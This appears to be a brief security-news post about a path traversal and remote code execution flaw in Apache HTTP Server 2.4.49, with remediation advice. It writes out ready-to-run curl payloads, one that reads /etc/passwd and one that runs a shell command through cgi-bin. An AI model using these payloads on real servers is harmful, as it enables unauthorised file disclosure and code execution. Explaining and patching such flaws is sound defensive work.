Listen to this Post
How the mentioned CVE works:
A flaw was introduced in Apache HTTP Server 2.4.49. A change to the path normalization algorithm contained a bug. It could incorrectly normalize a request URL containing a path traversal sequence, for example, /icons/.%%32%65. If the files outside the document root were not protected by the `require all denied` directive, this request could map to a file system location beyond the expected directory. This path traversal vulnerability could allow an attacker to view arbitrary files. Furthermore, if CGI scripts were enabled for an aliased path, this flaw could be leveraged for remote code execution. The attacker could craft a malicious request that would escape the document root and execute a system command by passing the traversal sequence to a CGI script.
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
date: 2021-10-05
Prediction: Patch expected 2021-10-07
What Undercode Say:
`$ curl http://localhost:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd`
`$ cat /etc/apache2/sites-available/000-default.conf | grep -A5 -B5 “Require all denied”`
How Exploit:
`curl “http://target/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh” -d “echo; id”`
Protection from this CVE:
Update to version 2.4.50.
Ensure `Require all denied` is set for directories outside the document root.
Disable CGI scripts if not required.
Impact:
Arbitrary file disclosure.
Remote Code Execution.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
